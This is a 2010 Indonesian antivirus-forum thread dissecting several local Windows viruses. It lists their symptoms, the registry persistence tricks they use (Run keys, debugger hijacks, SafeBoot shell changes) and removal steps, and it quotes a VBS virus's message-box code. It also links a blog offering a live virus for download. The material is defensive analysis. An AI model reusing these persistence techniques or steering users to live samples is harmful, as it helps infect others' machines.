Forum Smadav

Smadav Center => Konsultasi Virus => Topik dimulai oleh: Jastis pada Januari 09, 2010, 12:58:53 PM

Judul: Bedah Virus Disini !
Ditulis oleh: Jastis pada Januari 09, 2010, 12:58:53 PM
Bedah Virus : FLyff 666.dll.vbs

Sudah pernah dengar virus ini ??? kalau belum,gw juga baru2 aja dengar virus ginian.Ini salah satu virus yang dibuat oleh VM Indonesia Asli loh.....gw salut tuh sama VMnya [ om fly666 dari IH & DevilCode]... :-bd.Dab sepertinya virus ini belum disebarkan oleh siempunya,masih sebatas sharing di forum2 tertenu.Karena nih gw dapat dari teman saya di forum lain.

Lalu apa kehebatannya ???

Semua Drive di My Computer akan dihidden :
(http://i48.tinypic.com/huq0i1.jpg)

Control Panel akan didisable :
(http://i50.tinypic.com/5ajgcw.jpg)

Pesan di IE :
(http://i48.tinypic.com/1zd3xuf.jpg)

Akibat yang ditimbulkan dari virus ini :
=>Mendisable TaskManager,CMD,MsConfig,Regedit,Folder Option dll.
=>Akan membuat pesan Startup :” H4x0r3d By Flyff 666" dan “Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community".
=>Klik Kanan pada mouse akan didsable.
=>Disetiap Drive akan ada virus ini dan juga di C:\WINDOWS.
=>Dan sepertinya akan memblok beberapa AV,seperti Ansav,PCMAV dan NOD32.
=>Akan mendisable klik Kanan pada mouse.

Bersyukurlah klo anda pengguna Smadav,karena sejau ini Smadav blom masuk dalam kategori si empunya Virus.... :)

Cara mengatasinya :
->Masuk ke Safe mode:
->Buka Smadav dan lakukan scanning.Samapi disini smadav akan menemukan beberapa registry yang rusak/tidak sesuai langsung aja repair semuanya dan nama virus ini akan kedetect sm smadav,Tp cuman autorun.inf aja yg mampu diclean Smadav.Virus induknya takan masuk ke quarantine.Di quarantine Silahkan delete semuanya.Trus masuk  ke Smadav >> Tools >> System Editor,select all dan apply.sekarang restart komputernya.
->Masuk C:\WINDOWS cari nama virus ini,dan silahkan delete terlebih dahulu.

Di startup masih ada pesan si empunya virus.....hapus di regedit.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
Delete LegalNoticecaption dan LegalNoticeText.

dan cari lagi di regedit.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
Delete LegalNoticecaption dan LegalNoticeText

restart komputer.Silahkan Scan ulang dengan Smadav.Sampai disitu virus sudah tak berkutik........ :D


Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: ViGunZ pada Januari 09, 2010, 01:06:01 PM
Thanks Infonya Jastis  mudah-mudahan di SMADAV rev selanjutnya dapat Mendeteksi Virus ini
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: higiri_devil pada Januari 09, 2010, 01:23:18 PM
sep toturialnya ganas nie virusnya kalau kena langsung praktek tapi moga aja gak kena   ;>
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Jastis pada Januari 09, 2010, 01:36:22 PM
sep toturialnya ganas nie virusnya kalau kena langsung praktek tapi moga aja gak kena   ;>

dicoba aja dulu,tp sebelumnya gunakan Deepfreeze terlebih dahulu.....!
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: MathZ pada Januari 09, 2010, 01:38:20 PM
wedew virus baru lagi yach, serem amat nih virus. ctrl+D dulu lah takut kompi gw terjangkit nih virus.
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: MathZ pada Januari 09, 2010, 01:39:02 PM
kalo FD di hiden ga?
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Jastis pada Januari 09, 2010, 01:50:53 PM
kalo FD di hiden ga?
Sewaktu gw jalanin,ada dua FD yg terpasang dan hasilnya gak kelihatan....
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Jastis pada Januari 09, 2010, 02:43:02 PM
Bagi yang kepingin coba,silahkan download disini virusnya :http://jastisbago.blogspot.com/2010/01/mengenal-virus-flyff-666dllvbs.html (http://jastisbago.blogspot.com/2010/01/mengenal-virus-flyff-666dllvbs.html)


Salam
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Rizzal pada Januari 09, 2010, 03:02:00 PM
Untung disini ada cara mengatasi..  :P
KIS 2010 ga detek  ???
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: FAKHRICKER pada Januari 09, 2010, 03:28:15 PM
kalau dia bsa mengehtikan AV utk membersihkannya itu sih sama kayak cara kerja virus windx matrox buatan anak sulawesi, tapi bedanya dia bisa menolak 35 virus termaksud smadav jga
 >=) >=) >=)
Kalau versi windx matrox utk bsa menjalankan AV yg di tolaknya direname nama AVnya
Seperti PCMAV.exe menjadi PCMV.exe
Kalau dia bisa menolak PCMAV utk membersihkannya coba direname nama file PCMAV menjadi PCAV.exe ( Terserah kalian aja tapi ekstensinya jgn dihapus )
 :-\ :-\ :-\
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Rizzal pada Januari 09, 2010, 03:48:40 PM
Self Defends KIS2010 menghalangi semua program yg merename file nya.. :-bd
Jadi Aman  ;D
task Mgr aja g bisa kill prosesnya  :o
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Astbat pada Januari 09, 2010, 04:33:04 PM
Thkz 4 Share Mas

Kali Aja Berguna
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: andri099 pada Januari 10, 2010, 08:36:10 AM
Bagi yang kepingin coba,silahkan download disini virusnya :http://jastisbago.blogspot.com/2010/01/mengenal-virus-flyff-666dllvbs.html (http://jastisbago.blogspot.com/2010/01/mengenal-virus-flyff-666dllvbs.html)

kaga isa di klik gan di block ama webshiled...
di kasih rar trus kasi pass gan,,


Salam
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Yudh pada Januari 11, 2010, 09:37:17 AM
@Jastis:

izin download ya viri nya.... :) Mantap infonya... ;)

btw sudah bisa didetek juga sm AV lokal Tetangga sebagai CommonvirusVBS... :D ;)
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: Jastis pada Januari 11, 2010, 10:02:39 AM
Bagi yang kepingin coba,silahkan download disini virusnya :http://jastisbago.blogspot.com/2010/01/mengenal-virus-flyff-666dllvbs.html (http://jastisbago.blogspot.com/2010/01/mengenal-virus-flyff-666dllvbs.html)

kaga isa di klik gan di block ama webshiled...
di kasih rar trus kasi pass gan,,


Salam

oh...ya ?? revised
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: conficker.exe pada Januari 11, 2010, 10:52:56 AM
nais inpo bro Jastis, samplenya udah ane donlod ntar ane cek di rumah  :-bd :-bd
Judul: Bedah Virus
Ditulis oleh: Jastis pada Januari 28, 2010, 03:41:56 PM
Nih virus gw dapat dari thread :http://smadaver.com/diskusi-tentang-forum/upload-virus-ke-forum/240/ (http://smadaver.com/diskusi-tentang-forum/upload-virus-ke-forum/240/)

Ini gambar virus bila dilihat Descriptionnnya :
(http://i46.tinypic.com/29leg6f.jpg)

Bila diklik gambar tersebut diatas maka virus akan membuat file di C:\WINDOWS yang berukuran 198 kb dengan nama :
1.Ckpexp
2.Ckpinfo
3.Ckplog
Lihat gambar :
(http://i46.tinypic.com/315is6b.jpg)

Virus ini juga akan membuat file serupa di C:\WINDOWS\System32 dengan menambahkan file chelsea_logo.Ini sebagai file induk dari virus tersebut.
(http://i48.tinypic.com/25iyv5c.jpg)

Di drive C: virus membuat system file dengan nama lysys yang berukuran 198 kb.Ini sebagai system pertahanan dan system dari virus chelsea.
(http://i46.tinypic.com/25focpy.jpg)

Sekarang mari kita lihat apa akibat dari virus ini.


1. Semua gambar yang berextensi *.jpg atau *.jpeg akan berubah menjadi extensi *.exe dan file asli akan di hidden.
(http://i48.tinypic.com/2yngg3r.jpg)

2. Komputer yang terinfeksi akan log off secara tiba-tiba bila ada program atau aplikasi yang ingin dijalankan.

3. Setelah komputer log off atau di restart maka secara tiba-tiba destop akan berubah dengan gambar seorang cewek cantik nan seksi.Yang membuat setiap orang geram melihatnya.Karena gara-gara dia komputer gak bisa di operasikan……..
(http://i48.tinypic.com/33ojrec.jpg)

4. Virus akan mendisable Run,CMD,Task Manager,Folder Option.

Lalu bagaimana cara mengatasinya ? Oh iya, hampir lupa.Untung lu ingatkan.Ok langsung saja kita mulai.Karena virus ini virus lokal maka yang diperlukanpun Anti Virus Lokal.Cukup menggunakan Smadav rev 8.0.Smadav akan menditeksi virus ini sebagai New Heur.Variant

Untuk selengkapnya baca disini : http://jastisbago.blogspot.com/2010/01/mengenal-virus-chelsea-logoexe.html
 (http://jastisbago.blogspot.com/2010/01/mengenal-virus-chelsea-logoexe.html)

Salam Jastis
Judul: Re: Mengenal Virus Chelsea Logo.exe
Ditulis oleh: s4nji pada Januari 28, 2010, 03:56:44 PM
Wah, Smadav hebat :D
Judul: Re: Mengenal Virus Chelsea Logo.exe
Ditulis oleh: MacGyver_C2694 pada Januari 28, 2010, 03:57:32 PM
 :D kalo virusnya cakep kya gitu gw biarin saja, lumayan ;>
Judul: Re: Mengenal Virus Chelsea Logo.exe
Ditulis oleh: Jastis pada Januari 28, 2010, 04:04:47 PM
:D kalo virusnya cakep kya gitu gw biarin saja, lumayan ;>

weh...maunya !....tapi klo dah terinfeksi PC ente baru lu benci tuh cewe....!
Judul: Re: Mengenal Virus Chelsea Logo.exe
Ditulis oleh: den baguse ngarso pada Januari 29, 2010, 06:47:29 PM
hehehehe.......... brarti tinggal dicari cewe na bwat dmintai tanggung jawab gan..... nice info bo...
Judul: Worm:W32/VBWorm.AGR : Mengubah default page IE ke Hellspawn dan Friendster
Ditulis oleh: Jastis pada Maret 10, 2010, 04:31:47 AM
Ini adalah berita terbaru dari om Alfons.....saya post aja disini,semoga para Smadaver merasa terbantu dan be carefull tentunya. :)
 
Di dunia ini, selalu ada dua sisi yang saling bertentangan. Ambil contoh dalam dunia coding, dimana pada industri game ada satu perusahaan lokal yang kreatif dan berani mengambil resiko berhadapan dengan perusahaan-perusahaan game besar seperti Blizzard atau Ragnarok dengan meluncurkan game yang bernama Nusantara Online http://www.nusantara-online.com (http://www.nusantara-online.com)/ http://www.nusol.web.id (http://www.nusol.web.id) dengan thema karakter lokal dan kerajaan-kerajaan besar di Indonesia. Sebaliknya, pada dunia virus, seakan tidak mau kalah dengan maraknya penyebaran virus mancanegara, menyebar satu virus lokal yang memiliki ciri khas mengubah default page dan default search page dari Internet Explorer dari komputer korbannya. Alangkah bagusnya kalau energi dan kreativitas programmer virus yang berlebihan disalurkan ke hal-hal yang positif seperti mendukung pengembangan dan penyebaran aplikasi lokal.

Satu virus lokal lain yang perlu diwaspadai adalah VBWorm.AGR, virus ini mengubah default page Internet Explorer ke http://www.hellspawn.de.be (http://www.hellspawn.de.be) dan memberikan "bonus" mengubah defailt search page ke salah satu akun di Friendster. Virus ini dibuat dengan program bahasa Visual Basic dengan ukuran file sekitar 58 KB. Virus ini mempunyai ciri-ciri : (lihat gambar 1)
(http://vaksin.com/2010/0310/hellspawn/hellspawn_files/clip_image004.gif)
Gambar 1, File induk VBWorm.AGR

=> Menggunakan icon Folder
=> Ukuran file 58 KB
=> Type File "Application"
=> Ekstensi file "EXE"
    
Merubah Default Page ke http://www.hellspawn.de.be !

(http://vaksin.com/2010/0310/hellspawn/hellspawn_files/clip_image006.jpg)
Gambar 2, Default Page IE dirubah ke http://www.hellspawn.de.be

Merubah default Search Page ke http://www.frienster.com http://www.friendster.com/user.php?uid=27987774

(http://vaksin.com/2010/0310/hellspawn/hellspawn_files/clip_image008.gif)
Gambar 3, Default search page di arahkan ke satu page Friendster


Bagaimana mengenai virus VBWorm.AGR?

Sebenarnya tidaklah terlalu sulit untuk mengenali virus ini salah satunya adalah dengan melihat halaman awal dan search page dari Internet Explorer (lihat gambar 2 dan 3). Selain itu, pada saat menjalankan program regedit maka akan muncul pesan error seperti terlihat pada gambar 4 dibawah.

(http://vaksin.com/2010/0310/hellspawn/hellspawn_files/clip_image009.gif)
Gambar 4, Pesan yang tampil saat membuat aplikasi registry editor

Dengan update terbaru Norman Security Suite mendeteksi virus ini sebagai VBWorm.AGR (lihat gambar 5)

(http://vaksin.com/2010/0310/hellspawn/hellspawn_files/clip_image011.jpg)
Gambar 5, Hasil deteksi VBWorm.AGR


File induk VBWorm.AGR

Pada saat virus ini aktif di komputer target, ia akan membuat beberapa file induk yang akan dijalankan petama kali saat komputer dinyalakan

=> C:\WIndows
                     -> Lsass.exe
                     -> 310733.exe
                     -> z100427d.exe
                     -> cypreg.dll
=> C:\Windows\81374
                     -> system.exe
                     -> smss.exe
=> C:\WIndows\system32
                     -> 662832100427l.exe
                     -> moonlight.scr
=> C:\Document and Settings\Client\Templates\18282
                     -> winlogon.exe
                     -> services.exe
                     -> 018282.exe
=> C:\WINDOWS\81374
                     -> Smss.exe
                     -> Regedit.cmd
                     -> w412375.com
=> C:\WINDOWS\system32\15780a
                     -> 662832.cmd
=> C:\Documents and Settings\Client\Start Menu\Programs\Startup
                     -> adobe gama.cmd
=> C:\%user% p***.exe
=> C:\Data %user%.exe
=> C:\Foto %user%.exe
=> C:\Documents and Settings\%user%\My Documents\My Music
                     -> My Music.exe
=> C:\Documents and Settings\%user%\My Documents\My Pictures
                     -> My Pictures.exe

Registri Windows

Agar file tersebut dapat dijalankan secara otomatis, ia akan membuat beberapa string pada registri window berikut:

=> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                     -> 0 = C:\WINDOWS\l.exe
                     -> 028200 = C:\WINDOWS\l310733.exe
                     -> a82662 = C:\WINDOWS\notepad.exe:X
  
=> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
                     -> s0 = C:\WINDOWS\system32\l.exe
                     -> s1307330 = C:\WINDOWS\system32\662832100427l.exe

=>  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
                     -> shell =explorer.exe, "C:\Documents and Settings\%user%\Templates\18282\018282.exe"

Blok fungsi Windows

Untuk mempertahankan dirinya, ia akan melakukan blok terhadap beberapa fungsi windows utama seperti Task Manager, Registry Editor, Msconfig atau system restore, cara ini juga dilakukan untuk mengaktifkan dirinya pada saat user mengeksekusi aplikasi tersebut, Virus ini juga akan menyembunyikan file regedit.exe dan notepad.exe.

=> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe
                     -> debugger = C:\WINDOWS\regedit.exe:X
  
=> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution  Options\rstrui.exe
                     -> debugger = C:\WINDOWS\regedit.exe:X

=> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe
                     -> debugger = C:\WINDOWS\regedit.exe:X

=> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
                     -> UncheckedValue = 0

=> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
                     -> DisableRegistryTools

Pada saat user menjalankan aplikasi tersebut, ia juga akan memuculkan pesan seperti pada gambar 4 di atas.

Selain blok fungsi Windows tersebut, ia juga akan meninggalkan jejak lain dengan merubah halaman utama Internet Explorer dengan merubah string pada registri berikut:

=> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
                     -> Start Page = http://www.hellspawn.de.be
                     -> Windows Title = Lan Elitta
                     -> Search Page = http://www.friendster.com/user.php?uid=27987774

=> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser

=> HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\main
                      -> FullScreen = No

Aktif pada mode "safe mode with command prompt"

Virus ini tidak saja akan aktif pada mode "normal" tetapi lebih dari itu ia akan aktif pada mode "safe mode with comand prompt" dengan merubah string pada registry berikut:

=> HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot
                      -> AlternateShell = 662832100427l.exe
  
=> HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot
                      -> AlternateShell = 662832100427l.exe

=> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
                      -> AlternateShell = 662832100427l.exe


Memalsukan folder untuk menyebarkan dirinya

Target utama dari virus ini adalah menyembunyikan folder dan subfolder yang ditemukan, masih "untung" virus ini hanya akan menyembunyikan folder / subfolder yang ada di flash disk anda saja :-). Untuk mengelabui user ia akan membuat file duplikat dengan nama file yang sama dengan ciri-ciri : (lihat gambar 6)

=> Menggunakan icon Folder
=> Ukuran file 58 KB
=> Type File "Application"
=> Ekstensi file "EXE"

(http://vaksin.com/2010/0310/hellspawn/hellspawn_files/clip_image013.jpg)
 
Gambar 6,   File duplikat VBWorm.AGR

 
Media peyebaran

Untuk menyebarkan dirinya ia akan menggunakan media Flash Disk/Removable Disk dengan membuat file duplikat sesuai dengan nama file yang disembunyikan. Tidak seperti yang dilakukan oleh kebanyakan virus lokal, ia tidak akan menggunakan fitur autorun Windows untuk mengaktifkan dirinya.


Cara mengatasi VBWorm AGR

1.Nonaktifkan "System Restore" selama proses pembersihan

2.Matikan proses virus yang aktif dimemori dengan menggunakan tools "Ice Sword". Matikan proses virus yang mempunyai icon folder serta file cypreg.dll seperti terlihat pada gambar di bawah ini.

(http://vaksin.com/2010/0310/hellspawn/hellspawn_files/clip_image015.jpg)
Gambar 7, Matikan proses virus dengan tools "Ice Sword"

Tools ini dapat di download di alamat http://icesword.en.softonic.com/download (http://icesword.en.softonic.com/download)

3.Repair registry yang sudah diubah oleh virus. Salin script di bawah ini pada program notepad kemudian simpan denan nama REPAIR.INF, jalankan file tersebut dengan cara: Klik kanan REPAIR.INF | Klik INSTALL

Kode: [Pilih]
[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee

 

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

 

[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0,

"Explorer.exe"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKCU, Software\Microsoft\Internet Explorer\Main, start page,0, "about:blank"

HKCU, Software\Microsoft\Internet Explorer\Main, Search Page,0, "about:blank"

HKLM,

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperH

idden, UncheckedValue,0x00010001,1

 

 

[del]

HKCU,

Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD

HKCU,

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions

HKLM, Software\Microsoft\Windows\CurrentVersion\Run,0

HKLM, Software\Microsoft\Windows\CurrentVersion\Run,028200

HKLM, Software\Microsoft\Windows\CurrentVersion\Run,a82662

HKCU, Software\Microsoft\Windows\CurrentVersion\Run, s0

HKCU, Software\Microsoft\Windows\CurrentVersion\Run, s1307330

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Bron-Spizaetus

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\msconfig.exe

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\regedit.exe

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\rstrui.exe

HKCU, Software\Microsoft\Internet Explorer\Toolbar\WebBrowser

HKCU, Software\Microsoft\Internet Explorer\Main, Windows Title


4.Cari dan hapus file virus, sebelum melakukan proses penghapusan tampilkan file yang tersebunyi dengan merubah setting pada Folder Options. Kemudian hapus file berikut:

=> C:\Windows
                     -> Lsass.exe
                     -> 310733.exe
                     -> z100427d.exe
                     -> cypreg.dll
=> C:\Windows\81374
=> C:\WIndows\system32
                     -> 662832100427l.exe
                     -> moonlight.scr
=> C:\Document and Settings\Client\Templates\18282
=> C:\WINDOWS\81374
=> C:\WINDOWS\system32\15780a
=> C:\Documents and Settings\Client\Start Menu\Programs\Startup
                     -> adobe gama.cmd
=> C:\%user% p***.exe
=> C:\Data %user%.exe
=> C:\Foto %user%.exe
=> C:\Documents and Settings\%user%\My Documents\My Music
                     -> My Music.exe
=> C:\Documents and Settings\%user%\My Documents\My Pictures
                     -> My Picture.exe

Source : http://jastisbago.blogspot.com
Judul: Re: Worm:W32/VBWorm.AGR : Mengubah default page IE ke Hellspawn dan Friendster
Ditulis oleh: evens pada Maret 10, 2010, 05:39:56 AM
Sama yah artikelnya ma vaksin.com ??
Atau ada tambAHAN lain??
Judul: Re: Worm:W32/VBWorm.AGR : Mengubah default page IE ke Hellspawn dan Friendster
Ditulis oleh: Rh354 pada Maret 10, 2010, 05:59:54 AM
Sama yah artikelnya ma vaksin.com ??
Atau ada tambAHAN lain??
source aslinya dari vaksin koq wakakakaka...om alfons khan org vaksin wekekekeke
Judul: Re: Worm:W32/VBWorm.AGR : Mengubah default page IE ke Hellspawn dan Friendster
Ditulis oleh: Jastis pada Maret 10, 2010, 07:32:36 AM
Sama yah artikelnya ma vaksin.com ??
Atau ada tambAHAN lain??
source aslinya dari vaksin koq wakakakaka...om alfons khan org vaksin wekekekeke

hahahaha.....belum terkenal tuh om Alfons.......
Judul: Re: Worm:W32/VBWorm.AGR : Mengubah default page IE ke Hellspawn dan Friendster
Ditulis oleh: h3ndr@fum! pada Maret 10, 2010, 08:35:30 AM
ok...nice info..
Judul: Re: Worm:W32/VBWorm.AGR : Mengubah default page IE ke Hellspawn dan Friendster
Ditulis oleh: evens pada Maret 10, 2010, 03:01:12 PM
Sama yah artikelnya ma vaksin.com ??
Atau ada tambAHAN lain??
source aslinya dari vaksin koq wakakakaka...om alfons khan org vaksin wekekekeke

hahahaha.....belum terkenal tuh om Alfons.......
owh gtU, kadang aq cuma baCa2 artikel aja di vaksin.coM.
Kalo org dalam vaksin.CoM belum tau
:D haha
Judul: Re: Worm:W32/VBWorm.AGR : Mengubah default page IE ke Hellspawn dan Friendster
Ditulis oleh: Yudh pada Maret 11, 2010, 11:36:46 AM
Ada sampelnya gak mas Jastis..... mau donk... :D :)  kayanya seru tuh....
Judul: Bedah Virus : Virus KefiUNIQUE.ssV.variant bY Rch Trojans Boy
Ditulis oleh: Jastis pada Juli 14, 2010, 04:13:20 PM
Sudah lama saya tidak bermain-main dengan virus lagi,tapi sekarang saya sudah bebas (ngejomblo lagi dech :D) dan harus ikut bertempur lagi dengan virus-virus yang keren-keren.Kali ini saya akan membahas virus  KefiUNIQUE.ssV.variant yang saya dapat dari teman saya di Facebook yakni Rch Trojans Boy.Thanks Bro buat virusnya,sory baru saya cobain :D      

Jenis virus ini sebenarnya sudah sering  kita jumpai,karena hampir semua virus worm/VBS mempunyai cirri-ciri yang sama.Tetapi yang ini agak berbeda sedikit,kalau biasanya virus akan beraksi tanpa sepengatahuan korban,yang ini malah akan berinteraksi dengan korban terlebih dahulu sebelum computer korban akan dikuasai habis-habisan dan si koraban hanya tercengan dan menangis seperti anak bayi yang lagi kehabisan susu.(Karena susu ibu hanya untuk ayah :D).
Ini adalah gambar startup virus pertama kali dijalankan .
(http://i29.tinypic.com/i4jvbk.jpg)

Dan akan dikuti beberapa MsgBox seperti ini.
(http://i31.tinypic.com/x2njf4.jpg)
(http://i28.tinypic.com/28r2jd2.jpg)

Code :

Kode: [Pilih]
msgbox "Virus Start up aaahhhh...!", ,"Error Warning. . . !"
msgbox "Otak-atik nama IE ah...!", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "File Hiden gak bisa dilihat,,,gawat.....!", ,"Error Warning. . . !"
msgbox "wow...!Extensinya juga...!", ,"Error Warning. . . !"
msgbox "Hahahah.....wow super Hident bro....", ,"Error Warning. . . !"
msgbox "wahh.......Kaget nicH...!", ,"Error Warning. . . !"
msgbox "waduhh...Wa;papernya gak bisa diganti...!", ,"Error Warning. . . !"
msgbox "gak ada shutdownnya...!", ,"Error Warning. . . !"
msgbox "hahaha...makin parah aja ni koputer,,,!", ,"Error Warning. . . !"
msgbox "Gak bisa menuin kite ye...!", ,"Error Warning. . . !"
msgbox "wahh...apalagi folder optionnya ilang...!", ,"Error Warning. . . !"
msgbox "Gak bisa lari kemana-mana hayooo..!", ,"Error Warning. . . !"
msgbox "gak bisa bakar-bakar CD nuich", ,"Error Warning. . . !"
msgbox "klik kanan donk,,oh gak jadi...!", ,"Error Warning. . . !"
msgbox "di toolbar juga,,gawat,,,", ,"Error Warning. . . !"
msgbox "gak bisa pake hotkey,gak hot nih...", ,"Error Warning. . . !"
msgbox "wah..iconnya ilang....keren..", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "huft...gak bisa shutdown deh...!", ,"Error Warning. . . !"
msgbox "parahh..loe PC...!", ,"Error Warning. . . !"
msgbox "Hardisk diilangin juga nih,,,,", ,"Error Warning. . . !"
msgbox "Ane butuh CMD...", ,"Error Warning. . . !"
msgbox "buka Regedit gak bisa YChD", ,"Error Warning. . . !"
msgbox "Virusnya kill ah pke Task menager,,ha..gak bisa.!", ,"Error Warning. . . !"
msgbox "gak ada screan severnya,,,gak kereeen...!", ,"Error Warning. . . !"
msgbox "cuapeee nih virus...!", ,"Error Warning. . . !"
msgbox "Okeyy,,,lanjuttt....", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "Gak ada control panel", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "Aplikasi ku gak bisa dibukaaaaaaaaa.........!", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "f*** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "Huft selesai jga,,,otak-atik komputer loe...!", ,"Error Warning. . . !"

Lumayan capek kan dibuat MSgBoxnya si empunya Virus ?

Gejala-gejala yang ditimbulkan :

=> Perhatikan beberapa icon didestop ini :
(http://i29.tinypic.com/msgj9h.jpg)
Terlihat jelas kalau icon-icon aplikasi saya sudah dirubah oleh virus ke tipe VBS.

=> Semua icon rg.regwrite shell32.dll,2" akan dirubah ke VBS.

=> Sewaktu kita akan melakukan penyimpanan/Save AS,maka semua drive akan dihidden oleh virus alias drive kita tidak akan kelihatan setelah computer direstar.
(http://i26.tinypic.com/seq0r5.jpg)

=> Seperti kebanyaan virus,virus ini juga sudah pasti akan mendisable TaskManagaer,Regedit,Folder Option dan masih banyak lagi yang akan dikerjain oleh virus ini.Yang penting korban akan benar-benar menangis habis-habisan…………
